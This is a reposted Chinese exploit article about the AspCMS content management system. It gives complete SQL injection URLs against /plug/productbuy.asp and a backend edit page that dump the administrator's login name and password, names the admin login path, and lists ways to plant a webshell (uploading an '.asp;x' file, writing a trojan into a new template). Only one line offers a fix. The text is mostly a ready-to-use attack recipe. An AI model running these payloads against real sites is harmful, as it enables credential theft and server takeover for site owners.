aspcms 程序漏洞 注入+ cookies欺騙


漏洞出現在
/plug/productbuy.asp
對接收的參數id沒有進行過濾而導致的注入漏洞
注入后的頁面有跳轉,所以要快,建議用快捷鍵復制
爆用戶名
/plug/productbuy.asp?id=2+union+select+1,2,LoginName,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1
這是爆ID=1的賬戶名,如果發現權限不夠可以往后試2,3,4...........

爆密碼
/plug/productbuy.asp?id=2+union+select+1,2,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,
26,27,28,29,30,31,32,33,34,35,36,37+from+AspCms_User+where+userid=1

后台登錄地址:/admin/login.asp

后台拿shell
1、直接上傳.asp;x
2、系統配置信息
3、模版管理新建1.asp模板,內容寫馬的內容.

修復方法: id用cint(request("id"))

 

問題二:

————————后台注射————————
http://www.aspcms.com/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35%20from%20aspcms_user%20where%20userid=1 答案參考下文出處。。。。

詳細出處參考:http://hi.baidu.com/songmu6/blog/item/e3b094216ae0721e4d088d44.html


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM